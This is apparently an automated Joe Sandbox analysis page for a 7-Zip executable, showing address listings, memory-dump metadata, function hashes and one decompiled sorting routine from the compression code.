                                                                      0x0042dc82
                                                                      0x0042dc85
                                                                      0x0042dc85
                                                                      0x0042dc89
                                                                      0x0042dc8b
                                                                      0x0042dc8e
                                                                      0x0042dc9d
                                                                      0x0042dca1
                                                                      0x0042dca6
                                                                      0x0042dca9
                                                                      0x0042dcac
                                                                      0x0042dcaf
                                                                      0x0042dcb2
                                                                      0x0042dcb2
                                                                      0x0042dcb2
                                                                      0x0042dc8e
                                                                      0x0042dcb4
                                                                      0x0042dcb4
                                                                      0x0042dcb4
                                                                      0x0042dcb4
                                                                      0x00000000
                                                                      0x0042dcd9
                                                                      0x0042dcd9
                                                                      0x0042dcda
                                                                      0x0042dcdd
                                                                      0x0042dcdd
                                                                      0x00000000
                                                                      0x0042dc6c
                                                                      0x0042dc46
                                                                      0x0042dc48
                                                                      0x0042dc4b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0042dc4d
                                                                      0x0042dc4d
                                                                      0x0042dc52
                                                                      0x0042dc57
                                                                      0x0042dc58
                                                                      0x0042dc58
                                                                      0x0042dc5d
                                                                      0x0042dc5d
                                                                      0x00000000
                                                                      0x0042dc5d
                                                                      0x0042dc37
                                                                      0x0042dbe1
                                                                      0x0042dbe4
                                                                      0x0042dbe9
                                                                      0x0042dbee
                                                                      0x0042dbf1
                                                                      0x0042dbf4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0042dbf4
                                                                      0x00000000
                                                                      0x0042dbe1
                                                                      0x0042dc2c
                                                                      0x0042dc2e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0042dc2e
                                                                      0x0042dc23
                                                                      0x0042dc25
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0042dc25
                                                                      0x0042dbfc
                                                                      0x0042dc01
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0042dc03
                                                                      0x0042dc03
                                                                      0x0042dc0f
                                                                      0x0042dc14
                                                                      0x0042dc15
                                                                      0x00000000
                                                                      0x0042dc1c
                                                                      0x0042dc1c
                                                                      0x0042dc1c
                                                                      0x00000000
                                                                      0x0042dc1c

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID:
                                                                      • API String ID: 3519838083-0
                                                                      • Opcode ID: 2efe874e0d54bcc63b88533e8d0e92cc829ab34bf8cfbc3d7771b8826d61e310
                                                                      • Instruction ID: f0c02de7351495f9103b866f9f83217b28a37e7e00b398bfa100c8a62c2efe4d
                                                                      • Opcode Fuzzy Hash: 2efe874e0d54bcc63b88533e8d0e92cc829ab34bf8cfbc3d7771b8826d61e310
                                                                      • Instruction Fuzzy Hash: D2A14D70E006199FCB18DF56D8919AEB7B2FF94304F64842EE4159B351DB38AD81CB88
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00459170 Relevance: 1.6, Strings: 1, Instructions: 333COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 95%
                                                                      			E00459170(void* __ecx, signed char* __edx) {
				void* _t195;
				signed int _t200;
				signed int _t201;
				intOrPtr _t202;
				signed int _t207;
				signed int _t210;
				signed int _t214;
				signed int* _t216;
				void* _t219;
				void* _t226;
				intOrPtr _t231;
				void* _t242;
				void* _t244;
				void* _t246;
				void* _t248;
				signed char _t249;
				signed int _t252;
				signed int _t256;
				signed int _t257;
				intOrPtr _t260;
				signed int _t263;
				signed int _t266;
				signed int _t269;
				signed int _t272;
				signed char* _t291;
				signed int _t292;
				signed int* _t294;
				signed int _t296;
				intOrPtr _t297;
				signed int _t305;
				signed int _t310;
				signed int _t315;
				signed int _t320;
				unsigned int _t327;
				void* _t328;
				signed int* _t331;
				signed int _t332;
				void* _t339;
				signed int _t340;
				signed int _t344;
				void* _t345;
				signed int _t346;
				unsigned int _t349;
				intOrPtr _t350;
				signed int _t354;
				void* _t363;
				void* _t364;

				_t291 = __edx;
				_t346 =  *(_t363 + 0x24);
				_t226 = __ecx;
				_t339 = __ecx + _t346 * 4;
				_t195 = memset(_t339, 0, 0x10000 << 2);
				_t364 = _t363 + 0xc;
				_t327 = _t346 - 1;
				 *(_t364 + 0x18) = _t339;
				 *(_t364 + 0x24) = _t327;
				if(_t327 != 0) {
					do {
						 *((intOrPtr*)(_t339 + ((_t291[_t195] & 0x000000ff) << 0x00000008 | _t291[_t195 + 1] & 0x000000ff) * 4)) =  *((intOrPtr*)(_t339 + ((_t291[_t195] & 0x000000ff) << 0x00000008 | _t291[_t195 + 1] & 0x000000ff) * 4)) + 1;
						_t195 = _t195 + 1;
					} while (_t195 < _t327);
				}
				 *((intOrPtr*)(_t339 + (( *(_t195 + _t291) & 0x000000ff) << 0x00000008 |  *_t291 & 0x000000ff) * 4)) =  *((intOrPtr*)(_t339 + (( *(_t195 + _t291) & 0x000000ff) << 0x00000008 |  *_t291 & 0x000000ff) * 4)) + 1;
				_t328 = 0;
				_t200 = 0;
				do {
					_t231 =  *((intOrPtr*)(_t339 + _t200 * 4));
					if(_t231 != 0) {
						_t328 = _t328 + _t231;
					}
					 *((intOrPtr*)(_t339 + _t200 * 4)) = _t328 - _t231;
					_t200 = _t200 + 1;
				} while (_t200 < 0x10000);
				_t349 =  *(_t364 + 0x24);
				_t201 = 0;
				if(_t349 != 0) {
					do {
						 *((intOrPtr*)(_t339 + 0x40000 + _t201 * 4)) =  *((intOrPtr*)(_t339 + ((_t291[_t201] & 0x000000ff) << 0x00000008 | _t291[_t201 + 1] & 0x000000ff) * 4));
						_t201 = _t201 + 1;
					} while (_t201 < _t349);
				}
				 *((intOrPtr*)(_t339 + 0x40000 + _t201 * 4)) =  *((intOrPtr*)(_t339 + ((_t291[_t201] & 0x000000ff) << 0x00000008 |  *_t291 & 0x000000ff) * 4));
				_t202 = 0;
				if(_t349 != 0) {
					do {
						 *((intOrPtr*)(_t226 +  *(_t339 + ((_t291[_t202] & 0x000000ff) << 0x00000008 | _t291[_t202 + 1] & 0x000000ff) * 4) * 4)) = _t202;
						 *(_t339 + ((_t291[_t202] & 0x000000ff) << 0x00000008 | _t291[_t202 + 1] & 0x000000ff) * 4) =  *(_t339 + ((_t291[_t202] & 0x000000ff) << 0x00000008 | _t291[_t202 + 1] & 0x000000ff) * 4) + 1;
						_t202 = _t202 + 1;
					} while (_t202 < _t349);
				}
				 *((intOrPtr*)(_t226 +  *(_t339 + (( *(_t202 + _t291) & 0x000000ff) << 0x00000008 |  *_t291 & 0x000000ff) * 4) * 4)) = _t202;
				 *(_t339 + (( *(_t202 + _t291) & 0x000000ff) << 0x00000008 |  *_t291 & 0x000000ff) * 4) =  *(_t339 + (( *(_t202 + _t291) & 0x000000ff) << 0x00000008 |  *_t291 & 0x000000ff) * 4) + 1;
				_t207 = 0;
				_t331 = _t339 + 8;
				 *(_t364 + 0x14) = 0x4000;
				do {
					_t242 =  *(_t331 - 8) - _t207;
					if(_t242 != 0) {
						_t272 = _t242 - 1;
						if(_t272 != 0) {
							 *(_t226 + _t207 * 4) =  *(_t226 + _t207 * 4) | (_t272 & 0x000003ff | 0xfffff800) << 0x00000014;
							_t320 =  *(_t226 + _t207 * 4);
							if(_t272 >= 0x400) {
								 *(_t226 + _t207 * 4) = _t320 | 0x40000000;
								 *(_t226 + 4 + _t207 * 4) =  *(_t226 + 4 + _t207 * 4) | (_t272 & 0xfffffc00) << 0x0000000a;
							}
						}
						_t207 =  *(_t331 - 8);
					}
					_t244 =  *(_t331 - 4) - _t207;
					if(_t244 != 0) {
						_t269 = _t244 - 1;
						if(_t269 != 0) {
							 *(_t226 + _t207 * 4) =  *(_t226 + _t207 * 4) | (_t269 & 0x000003ff | 0xfffff800) << 0x00000014;
							_t315 =  *(_t226 + _t207 * 4);
							if(_t269 >= 0x400) {
								 *(_t226 + _t207 * 4) = _t315 | 0x40000000;
								 *(_t226 + 4 + _t207 * 4) =  *(_t226 + 4 + _t207 * 4) | (_t269 & 0xfffffc00) << 0x0000000a;
							}
						}
						_t207 =  *(_t331 - 4);
					}
					_t246 =  *_t331 - _t207;
					if(_t246 != 0) {
						_t266 = _t246 - 1;
						if(_t266 != 0) {
							 *(_t226 + _t207 * 4) =  *(_t226 + _t207 * 4) | (_t266 & 0x000003ff | 0xfffff800) << 0x00000014;
							_t310 =  *(_t226 + _t207 * 4);
							if(_t266 >= 0x400) {
								 *(_t226 + _t207 * 4) = _t310 | 0x40000000;
								 *(_t226 + 4 + _t207 * 4) =  *(_t226 + 4 + _t207 * 4) | (_t266 & 0xfffffc00) << 0x0000000a;
							}
						}
						_t207 =  *_t331;
					}
					_t248 = _t331[1] - _t207;
					if(_t248 != 0) {
						_t263 = _t248 - 1;
						if(_t263 != 0) {
							 *(_t226 + _t207 * 4) =  *(_t226 + _t207 * 4) | (_t263 & 0x000003ff | 0xfffff800) << 0x00000014;
							_t305 =  *(_t226 + _t207 * 4);
							if(_t263 >= 0x400) {
								 *(_t226 + _t207 * 4) = _t305 | 0x40000000;
								 *(_t226 + 4 + _t207 * 4) =  *(_t226 + 4 + _t207 * 4) | (_t263 & 0xfffffc00) << 0x0000000a;
							}
						}
						_t207 = _t331[1];
					}
					_t331 =  &(_t331[4]);
					_t123 = _t364 + 0x14;
					 *_t123 =  *(_t364 + 0x14) - 1;
				} while ( *_t123 != 0);
				_t249 = 0;
				if(_t349 != 0) {
					do {
						_t249 = _t249 + 1;
					} while (_t349 >> _t249 != 0);
				}
				 *((intOrPtr*)(_t364 + 0x20)) = 0x20;
				if(0x20 - _t249 > 0xc) {
					 *((intOrPtr*)(_t364 + 0x20)) = 0xc;
				}
				 *(_t364 + 0x14) = 2;
				while(1) {
					_t332 = 0;
					_t350 = 0;
					 *((intOrPtr*)(_t364 + 0x10)) = 0;
					 *(_t364 + 0x24) = 0;
					if( *((intOrPtr*)(_t364 + 0x2c)) <= 0) {
						break;
					} else {
						goto L40;
					}
					do {
						L40:
						_t214 =  *(_t226 + _t332 * 4);
						_t294 = _t226 + _t332 * 4;
						_t344 = _t214 >> 0x00000014 & 0x000003ff;
						_t256 =  !(_t214 >> 0x1f) & 0x00000001;
						if((_t214 & 0x40000000) != 0) {
							_t344 = _t344 + (_t294[1] >> 0x0000000a & 0x003ffc00);
							_t294[1] = _t294[1] & 0x000fffff;
							_t350 =  *((intOrPtr*)(_t364 + 0x10));
						}
						_t345 = _t344 + 1;
						 *_t294 = _t214 & 0x000fffff;
						if(_t256 != 0 || _t345 == 1) {
							_t296 = _t332 - _t350;
							 *(_t226 + _t296 * 4) =  *(_t226 + _t296 * 4) & 0x000fffff;
							_t216 = _t226 + _t296 * 4;
							if(_t350 > 1) {
								_t216[1] = _t216[1] & 0x000fffff;
							}
							_t297 = _t345 + _t350;
							_t166 = _t297 - 1; // -1
							_t257 = _t166;
							 *_t216 =  *_t216 | (_t257 & 0x000003ff) << 0x00000014;
							_t354 =  *_t216;
							if(_t297 > 0x400) {
								_t216[1] = _t216[1] | (_t257 & 0xfffffc00) << 0x0000000a;
								 *_t216 = _t354 | 0x40000000;
							}
							_t350 = _t297;
							 *((intOrPtr*)(_t364 + 0x10)) = _t350;
						} else {
							_t260 =  *((intOrPtr*)(_t364 + 0x2c));
							_t350 = 0;
							 *((intOrPtr*)(_t364 + 0x10)) = 0;
							if( *(_t364 + 0x14) < _t260) {
								_push(_t260);
								_push(0);
								_push(_t226);
								_push( *((intOrPtr*)(_t364 + 0x20)));
								_push(_t345);
								_push(_t332);
								if(E00458D60(_t260,  *(_t364 + 0x14)) != 0) {
									 *(_t364 + 0x24) = _t345 + _t332;
								}
							} else {
								_t219 = 0;
								if(_t345 != 0) {
									 *(_t364 + 0x1c) = _t294;
									do {
										 *((intOrPtr*)( *(_t364 + 0x18) + 0x40000 +  *_t294 * 4)) = _t219 + _t332;
										_t219 = _t219 + 1;
										_t294 =  &(( *(_t364 + 0x1c))[1]);
										 *(_t364 + 0x1c) = _t294;
									} while (_t219 < _t345);
									_t350 =  *((intOrPtr*)(_t364 + 0x10));
								}
							}
						}
						_t332 = _t332 + _t345;
					} while (_t332 <  *((intOrPtr*)(_t364 + 0x2c)));
					_t339 =  *(_t364 + 0x18);
					if( *(_t364 + 0x24) != 0) {
						 *(_t364 + 0x14) =  *(_t364 + 0x14) << 1;
						continue;
					}
					break;
				}
				_t210 = 0;
				if( *((intOrPtr*)(_t364 + 0x2c)) <= 0) {
					return  *((intOrPtr*)(_t339 + 0x40000));
				} else {
					do {
						_t340 =  *(_t226 + _t210 * 4);
						_t252 = _t340 >> 0x00000014 & 0x000003ff;
						if((_t340 & 0x40000000) != 0) {
							_t292 =  *(_t226 + 4 + _t210 * 4);
							_t252 = _t252 + (_t292 >> 0x0000000a & 0x003ffc00);
							 *(_t226 + 4 + _t210 * 4) = _t292 & 0x000fffff;
						}
						 *(_t226 + _t210 * 4) = _t340 & 0x000fffff;
						_t210 = _t210 + _t252 + 1;
					} while (_t210 <  *((intOrPtr*)(_t364 + 0x2c)));
					return  *((intOrPtr*)( *(_t364 + 0x18) + 0x40000));
				}
			}


















































                                                                      0x00459170
                                                                      0x00459175
                                                                      0x00459179
                                                                      0x0045917d
                                                                      0x00459189
                                                                      0x00459189
                                                                      0x0045918b
                                                                      0x0045918e
                                                                      0x00459192
                                                                      0x00459198
                                                                      0x004591a0
                                                                      0x004591ae
                                                                      0x004591b4
                                                                      0x004591b5
                                                                      0x004591a0
                                                                      0x004591c5
                                                                      0x004591cb
                                                                      0x004591cd
                                                                      0x004591d0
                                                                      0x004591d0
                                                                      0x004591d5
                                                                      0x004591d7
                                                                      0x004591d7
                                                                      0x004591dd
                                                                      0x004591e0
                                                                      0x004591e1
                                                                      0x004591e8
                                                                      0x004591ec
                                                                      0x004591f0
                                                                      0x004591f2
                                                                      0x00459203
                                                                      0x0045920a
                                                                      0x0045920b
                                                                      0x004591f2
                                                                      0x0045921e
                                                                      0x00459225
                                                                      0x00459229
                                                                      0x00459230
                                                                      0x00459241
                                                                      0x00459252
                                                                      0x00459258
                                                                      0x00459259
                                                                      0x00459230
                                                                      0x0045926c
                                                                      0x0045927b
                                                                      0x00459281
                                                                      0x00459283
                                                                      0x00459286
                                                                      0x00459290
                                                                      0x00459293
                                                                      0x00459295
                                                                      0x00459297
                                                                      0x00459298
                                                                      0x004592ab
                                                                      0x004592ae
                                                                      0x004592b7
                                                                      0x004592c5
                                                                      0x004592cf
                                                                      0x004592cf
                                                                      0x004592b7
                                                                      0x004592d1
                                                                      0x004592d1
                                                                      0x004592d7
                                                                      0x004592d9
                                                                      0x004592db
                                                                      0x004592dc
                                                                      0x004592ef
                                                                      0x004592f2
                                                                      0x004592fb
                                                                      0x00459309
                                                                      0x00459313
                                                                      0x00459313
                                                                      0x004592fb
                                                                      0x00459315
                                                                      0x00459315
                                                                      0x0045931a
                                                                      0x0045931c
                                                                      0x0045931e
                                                                      0x0045931f
                                                                      0x00459332
                                                                      0x00459335
                                                                      0x0045933e
                                                                      0x0045934c
                                                                      0x00459356
                                                                      0x00459356
                                                                      0x0045933e
                                                                      0x00459358
                                                                      0x00459358
                                                                      0x0045935d
                                                                      0x0045935f
                                                                      0x00459361
                                                                      0x00459362
                                                                      0x00459375
                                                                      0x00459378
                                                                      0x00459381
                                                                      0x0045938f
                                                                      0x00459399
                                                                      0x00459399
                                                                      0x00459381
                                                                      0x0045939b
                                                                      0x0045939b
                                                                      0x0045939e
                                                                      0x004593a1
                                                                      0x004593a1
                                                                      0x004593a1
                                                                      0x004593ab
                                                                      0x004593af
                                                                      0x004593b1
                                                                      0x004593b1
                                                                      0x004593b6
                                                                      0x004593b1
                                                                      0x004593c1
                                                                      0x004593c8
                                                                      0x004593ca
                                                                      0x004593ca
                                                                      0x004593d2
                                                                      0x004593e0
                                                                      0x004593e0
                                                                      0x004593e2
                                                                      0x004593e4
                                                                      0x004593e8
                                                                      0x004593f0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004593f6
                                                                      0x004593f6
                                                                      0x004593f6
                                                                      0x004593f9
                                                                      0x00459408
                                                                      0x0045940e
                                                                      0x00459416
                                                                      0x00459424
                                                                      0x0045942f
                                                                      0x00459432
                                                                      0x00459432
                                                                      0x0045943b
                                                                      0x0045943c
                                                                      0x00459440
                                                                      0x004594ae
                                                                      0x004594b0
                                                                      0x004594b7
                                                                      0x004594bd
                                                                      0x004594bf
                                                                      0x004594bf
                                                                      0x004594c6
                                                                      0x004594c9
                                                                      0x004594c9
                                                                      0x004594d7
                                                                      0x004594d9
                                                                      0x004594e1
                                                                      0x004594f2
                                                                      0x004594f5
                                                                      0x004594f5
                                                                      0x004594f7
                                                                      0x004594f9
                                                                      0x00459447
                                                                      0x00459447
                                                                      0x0045944b
                                                                      0x0045944d
                                                                      0x00459455
                                                                      0x00459493
                                                                      0x00459494
                                                                      0x00459496
                                                                      0x00459497
                                                                      0x00459498
                                                                      0x00459499
                                                                      0x004594a1
                                                                      0x004594a6
                                                                      0x004594a6
                                                                      0x00459457
                                                                      0x00459457
                                                                      0x0045945b
                                                                      0x00459461
                                                                      0x00459465
                                                                      0x0045946e
                                                                      0x00459479
                                                                      0x0045947a
                                                                      0x0045947d
                                                                      0x00459481
                                                                      0x00459485
                                                                      0x00459485
                                                                      0x0045945b
                                                                      0x00459455
                                                                      0x004594fd
                                                                      0x004594ff
                                                                      0x0045950e
                                                                      0x00459512
                                                                      0x00459514
                                                                      0x00000000
                                                                      0x00459514
                                                                      0x00000000
                                                                      0x00459512
                                                                      0x0045951d
                                                                      0x00459523
                                                                      0x0045958a
                                                                      0x00459525
                                                                      0x00459525
                                                                      0x00459525
                                                                      0x0045952d
                                                                      0x00459539
                                                                      0x0045953b
                                                                      0x0045954a
                                                                      0x00459552
                                                                      0x00459552
                                                                      0x0045955c
                                                                      0x0045955f
                                                                      0x00459563
                                                                      0x0045957a
                                                                      0x0045957a

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: YA1
                                                                      • API String ID: 0-613462611
                                                                      • Opcode ID: 37fe9a4fd3af81bafc73f8bd31f63684d8e342a2009f8b6bc144f44596592570
                                                                      • Instruction ID: dd7e7172c6b64ed9de0095458c467a227dd947ad75ddcf7282d203c4dea92fff
                                                                      • Opcode Fuzzy Hash: 37fe9a4fd3af81bafc73f8bd31f63684d8e342a2009f8b6bc144f44596592570
                                                                      • Instruction Fuzzy Hash: 6FD1F1715046168FD729CF1DC494236BBE1EF86305F094ABEED928B386D7389D19CB48
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0046E6BC Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetUnhandledExceptionFilter.KERNEL32 ref: 0046E6C1
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled
                                                                      • String ID:
                                                                      • API String ID: 3192549508-0
                                                                      • Opcode ID: 96d1a218dc145cbfe683c815ed6cd5901e87ae0f4932733bae86baee2274f339
                                                                      • Instruction ID: e72988c6cc3c963252b8e5e8b60d16be35970219d15e6aeca3667ec21c81da3b
                                                                      • Opcode Fuzzy Hash: 96d1a218dc145cbfe683c815ed6cd5901e87ae0f4932733bae86baee2274f339
                                                                      • Instruction Fuzzy Hash:
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004442E0 Relevance: .7, Instructions: 713COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 847cf75e5ec63b3d96b7018282e4526a6bca975eef9a7bcce02b43c1c4303fcc
                                                                      • Instruction ID: d9c78973a52d2a71a409461f923dbd808430b2c09cbe0837c917e918da1c98db
                                                                      • Opcode Fuzzy Hash: 847cf75e5ec63b3d96b7018282e4526a6bca975eef9a7bcce02b43c1c4303fcc
                                                                      • Instruction Fuzzy Hash: D75239706087418FE724CF29C480B6AF7E2BFC5314F148A1EE59987791DB38E846CB5A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00456CF0 Relevance: .6, Instructions: 615COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 32689895d184e7f7d0c8efe2be480a3565db7d92c53ad8a2ab611800512ab1f1
                                                                      • Instruction ID: 934345be54fcedd299f3ac20b6580096092592092bafc23d7fab85bf8debc7cd
                                                                      • Opcode Fuzzy Hash: 32689895d184e7f7d0c8efe2be480a3565db7d92c53ad8a2ab611800512ab1f1
                                                                      • Instruction Fuzzy Hash: 24425A72A087058FC718CF1AC48055AF7E2BFCC314F5A896EE89997351DB74E90ACB85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004514F0 Relevance: .6, Instructions: 565COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cf9465c887767747944f02be8cd1883d1280c098b0c5e3f404be3679971bfc79
                                                                      • Instruction ID: 56e6f142235e9d3d76dd4b9a838b0ae8b43fc399745457aca84a280bb1d57964
                                                                      • Opcode Fuzzy Hash: cf9465c887767747944f02be8cd1883d1280c098b0c5e3f404be3679971bfc79
                                                                      • Instruction Fuzzy Hash: 3E22C9317046458FC728CF2DC5907AA77E2AFC5305F144A2EE89AC7792D738E849CB89
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00461EF0 Relevance: .6, Instructions: 556COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
